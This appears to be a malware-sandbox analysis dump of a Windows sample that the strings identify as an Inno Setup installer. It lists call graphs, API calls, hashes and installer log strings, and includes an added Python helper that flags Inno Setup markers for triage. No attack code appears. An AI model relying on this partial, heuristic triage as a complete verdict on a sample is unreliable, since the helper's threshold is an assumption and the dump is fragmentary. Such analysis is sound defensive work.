53989 402660 4 API calls 53987->53989 53988->53987 53989->53987 53990->53890 53991->53890 53993 4151cb SetFocus 53992->53993 53993->53890 53994->53913 53995->53903 53996->53903 53998 4239ad GetWindowLongA 53997->53998 53999 4239b9 53997->53999 53998->53999 54000 467ca8 54001 467cde 54000->54001 54035 467ecb 54000->54035 54003 467d12 54001->54003 54006 467d5c 54001->54006 54007 467d6d 54001->54007 54008 467d3a 54001->54008 54009 467d4b 54001->54009 54010 467d29 54001->54010 54002 403400 4 API calls 54005 467f57 54002->54005 54004 46544c 19 API calls 54003->54004 54003->54035 54019 467d8f 54004->54019 54015 403400 4 API calls 54005->54015 54194 467a18 61 API calls 54006->54194 54195 467c38 40 API calls 54007->54195 54193 4676fc 37 API calls 
54008->54193 54036 467844 54009->54036 54192 467594 42 API calls 54010->54192 54018 467f5f 54015->54018 54017 467d2f 54017->54003 54017->54035 54020 48f514 18 API calls 54019->54020 54028 467dd1 54019->54028 54019->54035 54020->54028 54021 465388 19 API calls 54021->54028 54022 414a58 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54022->54028 54023 467eb8 54196 47ddd8 97 API calls 54023->54196 54025 42ca9c 6 API calls 54025->54028 54027 403450 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54027->54028 54028->54021 54028->54022 54028->54023 54028->54025 54028->54027 54030 466fa4 23 API calls 54028->54030 54032 467f39 54028->54032 54028->54035 54077 466ed0 54028->54077 54084 4666d8 54028->54084 54121 47d994 54028->54121 54197 467370 19 API calls 54028->54197 54030->54028 54034 466fa4 23 API calls 54032->54034 54034->54035 54035->54002 54198 468348 54036->54198 54039 4679dc 54041 403400 4 API calls 54039->54041 54040 414a58 4 API calls 54042 467892 54040->54042 54043 4679f1 54041->54043 54045 46789f 54042->54045 54046 4679cd 54042->54046 54044 403420 4 API calls 54043->54044 54047 4679fe 54044->54047 54048 42c7a8 5 API calls 54045->54048 54049 403450 4 API calls 54046->54049 54050 403400 4 API calls 54047->54050 54051 4678ae 54048->54051 54049->54039 54052 467a06 54050->54052 54053 42c36c 5 API calls 54051->54053 54052->54003 54054 4678b9 54053->54054 54201 4547f8 13 API calls 54054->54201 54056 46792b 54056->54039 54057 42cc24 7 API calls 54056->54057 54070 46798b 54056->54070 54058 467964 54057->54058 54063 450b64 4 API calls 54058->54063 54058->54070 54059 4678c6 54059->54056 54061 462e64 19 API calls 54059->54061 54060 42cc24 7 API calls 54062 4679a1 54060->54062 54064 4678f5 54061->54064 54062->54046 54069 450b64 4 API calls 54062->54069 54065 46797b 54063->54065 54066 462e64 19 API calls 54064->54066 54203 479aec 37 API calls 54065->54203 54068 467906 54066->54068 54071 450b34 4 API calls 54068->54071 54072 4679b8 54069->54072 54070->54039 54070->54046 
54070->54060 54073 46791b 54071->54073 54204 479aec 37 API calls 54072->54204 54202 479aec 37 API calls 54073->54202 54076 4679c8 54076->54039 54076->54046 54078 466ee1 54077->54078 54079 466edc 54077->54079 54397 466258 45 API calls 54078->54397 54080 466edf 54079->54080 54312 46693c 54079->54312 54080->54028 54082 466ee9 54082->54028 54085 46670b 54084->54085 54413 478b40 54085->54413 54087 466720 54088 466747 54087->54088 54089 466724 54087->54089 54091 46673e 54088->54091 54430 48f418 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54088->54430 54090 463064 20 API calls 54089->54090 54093 46672e 54090->54093 54097 403494 4 API calls 54091->54097 54120 466871 54091->54120 54096 403450 4 API calls 54093->54096 54094 466763 54094->54091 54099 46676b 54094->54099 54095 403400 4 API calls 54100 4668a6 54095->54100 54096->54091 54098 46681a 54097->54098 54101 40357c 4 API calls 54098->54101 54102 466fa4 23 API calls 54099->54102 54100->54028 54103 466827 54101->54103 54104 466778 54102->54104 54105 40357c 4 API calls 54103->54105 54431 42ef34 54104->54431 54107 466834 54105->54107 54109 40357c 4 API calls 54107->54109 54111 466841 54109->54111 54113 40357c 4 API calls 54111->54113 54112 4667ba 54114 403450 4 API calls 54112->54114 54115 46684f 54113->54115 54116 4667ca 54114->54116 54117 414a88 4 API calls 54115->54117 54116->54028 54118 466860 54117->54118 54119 46339c 11 API calls 54118->54119 54119->54120 54120->54095 54122 468348 42 API calls 54121->54122 54123 47d9d7 54122->54123 54124 47d9e0 54123->54124 54653 408b48 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54123->54653 54126 414a58 4 API calls 54124->54126 54127 47d9f0 54126->54127 54128 403450 4 API calls 54127->54128 54129 47d9fd 54128->54129 54480 468658 54129->54480 54132 47da0d 54134 414a58 4 API calls 54132->54134 54135 47da1d 54134->54135 54136 403450 4 API calls 54135->54136 54137 47da2a 54136->54137 54138 466040 SendMessageA 54137->54138 54139 47da43 54138->54139 54140 47da81 
54139->54140 54655 4751b4 23 API calls 54139->54655 54142 42414c 11 API calls 54140->54142 54143 47da8b 54142->54143 54144 47dab1 54143->54144 54145 47da9c SetActiveWindow 54143->54145 54509 47cf98 54144->54509 54145->54144 54192->54017 54193->54003 54194->54003 54195->54003 54196->54035 54197->54028 54205 4683d4 54198->54205 54201->54059 54202->54056 54203->54070 54204->54076 54206 414a58 4 API calls 54205->54206 54207 468406 54206->54207 54259 4630fc 54207->54259 54210 414a88 4 API calls 54211 468418 54210->54211 54212 468427 54211->54212 54215 468440 54211->54215 54289 479aec 37 API calls 54212->54289 54214 46843b 54216 403420 4 API calls 54214->54216 54217 468487 54215->54217 54219 46846e 54215->54219 54218 467876 54216->54218 54220 4684ec 54217->54220 54233 46848b 54217->54233 54218->54039 54218->54040 54290 479aec 37 API calls 54219->54290 54292 42ca28 CharNextA 54220->54292 54223 4684fb 54224 4684ff 54223->54224 54227 468518 54223->54227 54293 479aec 37 API calls 54224->54293 54226 4684d3 54291 479aec 37 API calls 54226->54291 54228 46853c 54227->54228 54268 46326c 54227->54268 54294 479aec 37 API calls 54228->54294 54232 46852c 54232->54228 54273 46329c 54232->54273 54233->54226 54233->54227 54236 468555 54237 403778 4 API calls 54236->54237 54238 46856b 54237->54238 54277 42c878 54238->54277 54241 46857c 54295 4632f8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54241->54295 54242 4685aa 54244 42c7a8 5 API calls 54242->54244 54246 4685b5 54244->54246 54245 46858f 54247 450b64 4 API calls 54245->54247 54248 42c36c 5 API calls 54246->54248 54250 46859c 54247->54250 54249 4685c0 54248->54249 54251 42ca9c 6 API calls 54249->54251 54296 479aec 37 API calls 54250->54296 54253 4685cb 54251->54253 54281 468368 54253->54281 54255 4685d3 54256 42cc24 7 API calls 54255->54256 54257 4685db 54256->54257 54257->54214 54297 479aec 37 API calls 54257->54297 54264 463116 54259->54264 54261 42ca9c 6 API calls 54261->54264 54262 403450 4 API calls 54262->54264 54263 406b18 
LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54263->54264 54264->54261 54264->54262 54264->54263 54265 46315f 54264->54265 54298 42c988 54264->54298 54266 403420 4 API calls 54265->54266 54267 463179 54266->54267 54267->54210 54270 463276 54268->54270 54269 463297 54269->54232 54270->54269 54271 463289 54270->54271 54309 42ca18 CharNextA 54270->54309 54271->54232 54274 4632a6 54273->54274 54275 4632d3 54274->54275 54310 42ca18 CharNextA 54274->54310 54275->54228 54275->54236 54278 42c8d1 54277->54278 54279 42c88e 54277->54279 54278->54241 54278->54242 54279->54278 54311 42ca18 CharNextA 54279->54311 54282 4683cd 54281->54282 54283 46837b 54281->54283 54282->54255 54283->54282 54284 41ee14 2 API calls 54283->54284 54285 46838b 54284->54285 54286 4683a5 SHPathPrepareForWriteA 54285->54286 54287 41eec8 6 API calls 54286->54287 54288 4683c5 54287->54288 54288->54255 54289->54214 54290->54214 54291->54214 54292->54223 54293->54214 54294->54214 54295->54245 54296->54214 54297->54214 54299 403494 4 API calls 54298->54299 54300 42c998 54299->54300 54301 403744 4 API calls 54300->54301 54304 42c9ce 54300->54304 54307 42c3b4 IsDBCSLeadByte 54300->54307 54301->54300 54303 42ca12 54303->54264 54304->54303 54306 4037b8 4 API calls 54304->54306 54308 42c3b4 IsDBCSLeadByte 54304->54308 54306->54304 54307->54300 54308->54304 54309->54270 54310->54274 54311->54279 54314 466983 54312->54314 54313 466dfb 54316 466e16 54313->54316 54317 466e47 54313->54317 54314->54313 54315 466a3e 54314->54315 54319 403494 4 API calls 54314->54319 54318 466a5f 54315->54318 54322 466aa0 54315->54322 54320 403494 4 API calls 54316->54320 54321 403494 4 API calls 54317->54321 54323 403494 4 API calls 54318->54323 54324 4669c2 54319->54324 54325 466e24 54320->54325 54326 466e55 54321->54326 54330 403400 4 API calls 54322->54330 54327 466a6d 54323->54327 54328 414a58 4 API calls 54324->54328 54409 465934 12 API calls 54325->54409 54410 465934 12 API calls 54326->54410 54332 414a58 4 API calls 
54327->54332 54333 4669e3 54328->54333 54335 466a9e 54330->54335 54337 466a8e 54332->54337 54338 403634 4 API calls 54333->54338 54334 466e32 54336 403400 4 API calls 54334->54336 54384 466b84 54335->54384 54398 466040 54335->54398 54340 466e78 54336->54340 54342 403634 4 API calls 54337->54342 54343 4669f3 54338->54343 54346 403400 4 API calls 54340->54346 54341 466c0c 54344 403400 4 API calls 54341->54344 54342->54335 54347 414a58 4 API calls 54343->54347 54348 466c0a 54344->54348 54345 466ac0 54349 466ac6 54345->54349 54350 466afe 54345->54350 54351 466e80 54346->54351 54352 466a07 54347->54352 54404 46647c 42 API calls 54348->54404 54353 403494 4 API calls 54349->54353 54355 403400 4 API calls 54350->54355 54354 403420 4 API calls 54351->54354 54352->54315 54360 414a58 4 API calls 54352->54360 54356 466ad4 54353->54356 54357 466e8d 54354->54357 54359 466afc 54355->54359 54363 47742c 42 API calls 54356->54363 54357->54080 54358 466bcb 54364 403494 4 API calls 54358->54364 54371 466334 42 API calls 54359->54371 54361 466a2e 54360->54361 54365 403634 4 API calls 54361->54365 54367 466aec 54363->54367 54368 466bd9 54364->54368 54365->54315 54366 466c35 54374 466c96 54366->54374 54375 466c40 54366->54375 54369 403634 4 API calls 54367->54369 54370 414a58 4 API calls 54368->54370 54369->54359 54372 466bfa 54370->54372 54373 466b25 54371->54373 54376 403634 4 API calls 54372->54376 54379 466b86 54373->54379 54380 466b30 54373->54380 54377 403400 4 API calls 54374->54377 54378 403494 4 API calls 54375->54378 54376->54348 54381 466c9e 54377->54381 54387 466c4e 54378->54387 54383 403400 4 API calls 54379->54383 54382 403494 4 API calls 54380->54382 54385 466c94 54381->54385 54396 466d47 54381->54396 54389 466b3e 54382->54389 54383->54384 54384->54341 54384->54358 54385->54381 54405 48f418 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54385->54405 54387->54381 54387->54385 54390 403634 4 API calls 54387->54390 54388 466cc1 54388->54396 54406 48f680 18 API calls 
54388->54406 54389->54384 54392 403634 4 API calls 54389->54392 54390->54387 54392->54389 54394 466de8 54408 4290b4 SendMessageA SendMessageA 54394->54408 54407 429064 SendMessageA 54396->54407 54397->54082 54411 429fb0 SendMessageA 54398->54411 54400 46604f 54401 46606f 54400->54401 54412 429fb0 SendMessageA 54400->54412 54401->54345 54403 46605f 54403->54345 54404->54366 54405->54388 54406->54396 54407->54394 54408->54313 54409->54334 54410->54334 54411->54400 54412->54403 54414 478b6e 54413->54414 54418 478ba4 54413->54418 54448 4546f8 54414->54448 54415 403420 4 API calls 54416 478ca5 54415->54416 54416->54087 54418->54415 54419 478c6e 54419->54087 54420 474a30 19 API calls 54423 478b98 54420->54423 54421 47742c 42 API calls 54421->54423 54422 47742c 42 API calls 54426 478c1c 54422->54426 54423->54418 54423->54419 54423->54420 54423->54421 54423->54426 54455 478700 31 API calls 54423->54455 54425 42c808 5 API calls 54425->54426 54426->54422 54426->54423 54426->54425 54427 42c830 5 API calls 54426->54427 54429 478c5b 54426->54429 54456 47884c 54 API calls 54426->54456 54427->54426 54429->54418 54430->54094 54432 42ef40 54431->54432 54433 42ef63 GetActiveWindow GetFocus 54432->54433 54434 41ee14 2 API calls 54433->54434 54435 42ef7a 54434->54435 54436 42ef97 54435->54436 54437 42ef87 RegisterClassA 54435->54437 54438 42f026 SetFocus 54436->54438 54439 42efa5 CreateWindowExA 54436->54439 54437->54436 54441 403400 4 API calls 54438->54441 54439->54438 54440 42efd8 54439->54440 54474 4241ec 54440->54474 54443 42f042 54441->54443 54447 48f680 18 API calls 54443->54447 54444 42f000 54445 42f008 CreateWindowExA 54444->54445 54445->54438 54446 42f01e ShowWindow 54445->54446 54446->54438 54447->54112 54449 454709 54448->54449 54450 454716 54449->54450 54451 45470d 54449->54451 54465 4544dc 29 API calls 54450->54465 54457 4543fc 54451->54457 54454 454713 54454->54423 54455->54423 54456->54426 54458 42dc54 RegOpenKeyExA 54457->54458 54459 454419 54458->54459 54460 454467 
                                                                                      Strings
                                                                                      • Version of existing file: %u.%u.%u.%u, xrefs: 0046CA98
                                                                                      • Dest filename: %s, xrefs: 0046C7B0
                                                                                      • Skipping due to "onlyifdoesntexist" flag., xrefs: 0046C8EA
                                                                                      • @, xrefs: 0046C6CC
                                                                                      • Time stamp of existing file: (failed to read), xrefs: 0046C953
                                                                                      • Incrementing shared file count (32-bit)., xrefs: 0046D4A4
                                                                                      • IF, xrefs: 0046D613
                                                                                      • Will register the file (a DLL/OCX) later., xrefs: 0046D41E
                                                                                      • Version of our file: %u.%u.%u.%u, xrefs: 0046CA0C
                                                                                      • Existing file is protected by Windows File Protection. Skipping., xrefs: 0046CD08
                                                                                      • Existing file is a newer version. Skipping., xrefs: 0046CB1E
                                                                                      • -- File entry --, xrefs: 0046C617
                                                                                      • Dest file is protected by Windows File Protection., xrefs: 0046C809
                                                                                      • Existing file's MD5 sum matches our file. Skipping., xrefs: 0046CBD1
                                                                                      • Version of existing file: (none), xrefs: 0046CC16
                                                                                      • Dest file exists., xrefs: 0046C8D7
                                                                                      • Couldn't read time stamp. Skipping., xrefs: 0046CC51
                                                                                      • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046CDB2
                                                                                      • , xrefs: 0046CAEB, 0046CCBC, 0046CD3A
                                                                                      • .tmp, xrefs: 0046CED3
                                                                                      • Installing the file., xrefs: 0046CE25
                                                                                      • Version of our file: (none), xrefs: 0046CA18
                                                                                      • Non-default bitness: 32-bit, xrefs: 0046C7D7
                                                                                      • Time stamp of our file: (failed to read), xrefs: 0046C8C3
                                                                                      • Failed to read existing file's MD5 sum. Proceeding., xrefs: 0046CBEC
                                                                                      • Existing file has a later time stamp. Skipping., xrefs: 0046CCEB
                                                                                      • Will register the file (a type library) later., xrefs: 0046D412
                                                                                      • Stripped read-only attribute., xrefs: 0046CDE3
                                                                                      • Time stamp of existing file: %s, xrefs: 0046C947
                                                                                      • Same time stamp. Skipping., xrefs: 0046CC71
                                                                                      • InUn, xrefs: 0046D061
                                                                                      • Uninstaller requires administrator: %s, xrefs: 0046D091
                                                                                      • User opted not to overwrite the existing file. Skipping., xrefs: 0046CD69
                                                                                      • Skipping due to "onlyifdestfileexists" flag., xrefs: 0046CE16
                                                                                      • Time stamp of our file: %s, xrefs: 0046C8B7
                                                                                      • Existing file's MD5 sum is different from our file. Proceeding., xrefs: 0046CBE0
                                                                                      • Incrementing shared file count (64-bit)., xrefs: 0046D48B
                                                                                      • Failed to strip read-only attribute., xrefs: 0046CDEF
                                                                                      • Same version. Skipping., xrefs: 0046CC01
                                                                                      • Non-default bitness: 64-bit, xrefs: 0046C7CB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's MD5 sum is different from our file. Proceeding.$Existing file's MD5 sum matches our file. Skipping.$Failed to read existing file's MD5 sum. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing the file.$IF$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                      • API String ID: 0-3571605357
                                                                                      • Opcode ID: c331ed72d788f652b5d8a0e231ec5862484b2ca6a8e1fb95928deca83195554c
                                                                                      • Instruction ID: bbba4ebc422fcc932ed0245fa1df0834f4a6a16cbc4990aadff4421ccbeeb5a2
                                                                                      • Opcode Fuzzy Hash: c331ed72d788f652b5d8a0e231ec5862484b2ca6a8e1fb95928deca83195554c
                                                                                      • Instruction Fuzzy Hash: 54928630E042889FCB11DFA5C485BEDBBB5AF05308F5440ABE844B7392D7789E45DB5A
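The String ID list above ("onlyifdoesntexist", "onlyifdestfileexists", "Dest file is protected by Windows File Protection.", "Incrementing shared file count (32-bit).") is the file-installation log vocabulary of the Inno Setup installer engine, so this function belongs to the installer wrapper rather than to the payload. The following triage helper is an added example, not code from the report or from the sample: it scans a strings dump for those engine markers and for the uninstaller file mask, and only returns a verdict when two independent signals agree. The marker list, the threshold and both sample dumps are constructed here for illustration.

```python
import re
from typing import Iterable

# Constructed marker set: literal Setup-engine log messages taken from the
# "String ID" list above. Each is an exact line of the installer's log output.
INNO_SETUP_MARKERS = (
    'Skipping due to "onlyifdoesntexist" flag.',
    'Skipping due to "onlyifdestfileexists" flag.',
    "Dest file is protected by Windows File Protection.",
    "Incrementing shared file count (32-bit).",
    "Will register the file (a DLL/OCX) later.",
    "Will register the file (a type library) later.",
)
# Search mask the engine uses for its own uninstaller files (unins???.exe/.dat).
UNINS_MASK_RE = re.compile(r"^unins\?\?\?\.\*$")
# [Files]-section flag names quoted inside the log messages.
FLAG_RE = re.compile(r'"(onlyifdoesntexist|onlyifdestfileexists)"')


def find_inno_markers(strings: Iterable[str]) -> dict:
    """Collect which installer-engine markers occur in a strings dump."""
    hits = {"messages": [], "flags": set(), "unins_mask": False}
    for s in strings:
        s = s.strip()
        if s in INNO_SETUP_MARKERS:
            hits["messages"].append(s)
        for m in FLAG_RE.finditer(s):
            hits["flags"].add(m.group(1))
        if UNINS_MASK_RE.match(s):
            hits["unins_mask"] = True
    return hits


def classify(strings: Iterable[str]) -> str:
    """Return 'inno-setup-engine' when at least two independent signals are
    present (two distinct log messages, a quoted flag name, or the uninstaller
    mask); a single coincidental string is not enough. Threshold is an
    assumption of this example."""
    h = find_inno_markers(strings)
    signals = (len(set(h["messages"])) >= 2) + bool(h["flags"]) + h["unins_mask"]
    return "inno-setup-engine" if signals >= 2 else "unknown"


# Constructed strings dump modelled on the String ID lists in this report.
SAMPLE_DUMP = [
    "-- File entry --",
    "Dest filename: %s",
    'Skipping due to "onlyifdoesntexist" flag.',
    "Existing file's MD5 sum matches our file. Skipping.",
    "Incrementing shared file count (32-bit).",
    "unins???.*",
    "STOPIMAGE",
]
# Constructed control dump with no installer-engine vocabulary.
CONTROL_DUMP = ["kernel32.dll", "GetProcAddress", "C:\\Users\\Public"]

if __name__ == "__main__":
    print(classify(SAMPLE_DUMP), find_inno_markers(SAMPLE_DUMP))
    print(classify(CONTROL_DUMP))
```

A positive verdict only tells you that the code region comes from the installer engine; it says nothing about the payload the installer carries, so analysis of the dropped files still has to be done separately.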

                                                                                      Control-flow Graph
                                                                                      • Rendered graph (nodes marked Executed / Not Executed) not reproduced. Function entry: 00423B7C. API calls reached from its basic blocks: IsIconic, GetFocus, SetFocus, SendMessageA, PostMessageA, IsWindowEnabled, IsWindowVisible.
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3f3425962c5664b7636b89eb7a729afb539010c318ec026ce06c6a7b4d19c74a
                                                                                      • Instruction ID: 08d2eb01bbb0ed60fc7aa7cee5e011afdc801c2d0a550085eeb8675b0aa62de6
                                                                                      • Opcode Fuzzy Hash: 3f3425962c5664b7636b89eb7a729afb539010c318ec026ce06c6a7b4d19c74a
                                                                                      • Instruction Fuzzy Hash: ACE19A30B00124EBC710DF69E585A5EB7B0FF48704FA441AAE645AB352CB7DEE81DB09

                                                                                      Control-flow Graph
                                                                                      • Rendered graph (nodes marked Executed / Not Executed) not reproduced. Function entry: 00463B8C. API calls reached from its basic blocks: LoadBitmapA, GetSystemMenu, AppendMenuA (twice); the remaining nodes are calls into internal subroutines listed under APIs below.
                                                                                      APIs
                                                                                        • Part of subcall function 00490078: GetWindowRect.USER32(00000000), ref: 0049008E
                                                                                      • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00463F5B
                                                                                        • Part of subcall function 0041D620: GetObjectA.GDI32(?,00000018,00463F75), ref: 0041D64B
                                                                                        • Part of subcall function 004639E8: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00463A85
                                                                                        • Part of subcall function 004639E8: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00463AAB
                                                                                        • Part of subcall function 004639E8: SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 00463B07
                                                                                        • Part of subcall function 004639E8: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00463B2D
                                                                                        • Part of subcall function 004633A4: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00464010,00000000,00000000,00000000,0000000C,00000000), ref: 004633BC
                                                                                        • Part of subcall function 004902D4: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 004902DE
                                                                                        • Part of subcall function 0048FFC8: 73A0A570.USER32(00000000,?,?,?), ref: 0048FFEA
                                                                                        • Part of subcall function 0048FFC8: SelectObject.GDI32(?,00000000), ref: 00490010
                                                                                        • Part of subcall function 0048FFC8: 73A0A480.USER32(00000000,?,0049006E,00490067,?,00000000,?,?,?), ref: 00490061
                                                                                        • Part of subcall function 004902C4: MulDiv.KERNEL32(0000004B,?,00000006), ref: 004902CE
                                                                                      • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0232ED5C,023309B0,?,?,023309E0,?,?,02330A30,?), ref: 00464BD3
                                                                                      • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 00464BE4
                                                                                      • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00464BFC
                                                                                        • Part of subcall function 00429FCC: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 00429FE2
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Menu$AppendExtractFileIconInfoObject$A480A570BitmapCallbackDispatcherLoadMessageRectSelectSendSystemUserWindow
                                                                                      • String ID: $(Default)$STOPIMAGE
                                                                                      • API String ID: 1965080796-770201673
                                                                                      • Opcode ID: 80f7aee92de1e31dca4f16c75dc9a4f5f3520f9015eb7726ec2554a956d9f7b2
                                                                                      • Instruction ID: 9b804f360638e7ec9479bb78d72ee5234d78dd0d5496d892e29c920f99ca9afd
                                                                                      • Opcode Fuzzy Hash: 80f7aee92de1e31dca4f16c75dc9a4f5f3520f9015eb7726ec2554a956d9f7b2
                                                                                      • Instruction Fuzzy Hash: 7DF2C6386105218FCB00EF69D8D9F9973F5BF89304F1541B6E9049B36ADB78AC46CB4A

                                                                                      Control-flow Graph
                                                                                      • Rendered graph (nodes marked Executed / Not Executed) not reproduced. Function entry: 0047A964. Two FindFirstFileA / FindNextFileA / FindClose enumeration loops; the second loop calls 0047A964 again (recursive directory walk).
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,?,00000000,?,00000000,13I,?,00000000,00000000,?,?,0047BCC8,?,?,00000000), ref: 0047A9C4
                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,?,?,00000000,?,00000000,13I,?,00000000,00000000,?,?,0047BCC8,?), ref: 0047AA0D
                                                                                      • FindClose.KERNEL32(000000FF,000000FF,?,00000000,?,?,00000000,?,00000000,13I,?,00000000,00000000,?,?,0047BCC8), ref: 0047AA1A
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,13I,?,00000000,00000000,?,?,0047BCC8,?), ref: 0047AA66
                                                                                      • FindNextFileA.KERNEL32(000000FF,?,00000000,0047AB33,?,00000000,?,00000000,?,?,00000000,?,00000000,13I,?,00000000), ref: 0047AB0F
                                                                                      • FindClose.KERNEL32(000000FF,0047AB3A,0047AB33,?,00000000,?,00000000,?,?,00000000,?,00000000,13I,?,00000000,00000000), ref: 0047AB2D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID: 13I
                                                                                      • API String ID: 3541575487-562285233
                                                                                      • Opcode ID: 14a22c9b19f9f593fc8f290ef9588bdea0a1845b81f46d5d148d05f04d7c5859
                                                                                      • Instruction ID: 4e67e333ed9d0cc1fab42887fed5e7c2c21fb1f12194a2671a08295e0f582913
                                                                                      • Opcode Fuzzy Hash: 14a22c9b19f9f593fc8f290ef9588bdea0a1845b81f46d5d148d05f04d7c5859
                                                                                      • Instruction Fuzzy Hash: C7517E71900648AFCB11EFA6CC45ADEB7BCEB88315F1084BAA508E7341D6389F95CF19
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,00470DEE,?,?,00000001,00497154), ref: 00470CDD
                                                                                      • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00470DEE,?,?,00000001,00497154), ref: 00470DBA
                                                                                      • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00470DEE,?,?,00000001,00497154), ref: 00470DC8
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID: unins$unins???.*
                                                                                      • API String ID: 3541575487-1009660736
                                                                                      • Opcode ID: b8508960964e18f228b5b6a455ee562c9244d5bac447fc9a6e43c63091bc2de7
